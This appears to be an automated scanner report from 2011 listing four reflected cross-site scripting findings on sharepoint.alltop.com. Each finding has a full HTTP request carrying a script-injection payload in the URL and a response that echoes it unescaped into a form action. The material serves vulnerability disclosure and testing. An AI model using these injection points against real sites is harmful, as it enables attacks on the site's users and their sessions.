1. Cross-site scripting (reflected)
1.1. http://sharepoint.alltop.com/ [name of an arbitrarily supplied request parameter]
1.2. http://sharepoint.alltop.com/css/din-bold.swf [REST URL parameter 1]
1.3. http://sharepoint.alltop.com/css/din-bold.swf [REST URL parameter 2]
1.4. http://sharepoint.alltop.com/favicon.ico [REST URL parameter 1]
Severity: | High |
Confidence: | Certain |
Host: | http://sharepoint.alltop |
Path: | / |
GET /?b1917"><script>alert(1)< Host: sharepoint.alltop.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Tue, 08 Mar 2011 20:43:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Set-Cookie: EPClientLogin=7ec728 Set-Cookie: myAlltopSession Expires: Tue, 08 Mar 2011 21:43:30 GMT Cache-Control: private, max-age=10800, pre-check=10800 Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT Set-Cookie: alltop_v=151a39200e8 Set-Cookie: alltop_r=159; expires=Mon, 06-Jun-2011 20:43:30 GMT; path=/; domain=.alltop.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 249024 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <form action="/?b1917"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sharepoint.alltop |
Path: | /css/din-bold.swf |
GET /css3aa9a"><script>alert(1)< Host: sharepoint.alltop.com Proxy-Connection: keep-alive Referer: http://sharepoint.alltop Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: myAlltopSession |
HTTP/1.1 404 Not Found Date: Tue, 08 Mar 2011 20:44:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Set-Cookie: EPClientLogin=7ec728 Set-Cookie: myAlltopSession Expires: Tue, 08 Mar 2011 21:44:21 GMT Cache-Control: private, max-age=10800, pre-check=10800 Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT Set-Cookie: alltop_r=159; expires=Mon, 06-Jun-2011 20:44:21 GMT; path=/; domain=.alltop.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 248985 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <form action="/css3aa9a"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sharepoint.alltop |
Path: | /css/din-bold.swf |
GET /css/din-bold.swfc4986"><script>alert(1)< Host: sharepoint.alltop.com Proxy-Connection: keep-alive Referer: http://sharepoint.alltop Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: myAlltopSession |
HTTP/1.1 404 Not Found Date: Tue, 08 Mar 2011 20:44:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Set-Cookie: EPClientLogin=7ec728 Set-Cookie: myAlltopSession Expires: Tue, 08 Mar 2011 21:44:23 GMT Cache-Control: private, max-age=10800, pre-check=10800 Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT Set-Cookie: alltop_r=159; expires=Mon, 06-Jun-2011 20:44:23 GMT; path=/; domain=.alltop.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 248985 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <form action="/css/din-bold.swfc4986"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://sharepoint.alltop |
Path: | /favicon.ico |
GET /favicon.icoa6c4d"><script>alert(1)< Host: sharepoint.alltop.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: myAlltopSession |
HTTP/1.1 404 Not Found Date: Tue, 08 Mar 2011 20:44:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Set-Cookie: EPClientLogin=7ec728 Set-Cookie: myAlltopSession Expires: Tue, 08 Mar 2011 21:44:17 GMT Cache-Control: private, max-age=10800, pre-check=10800 Last-Modified: Mon, 15 Nov 2010 16:29:58 GMT Set-Cookie: alltop_r=159; expires=Mon, 06-Jun-2011 20:44:17 GMT; path=/; domain=.alltop.com Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 248965 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <form action="/favicon.icoa6c4d"><script>alert(1)< ...[SNIP]... |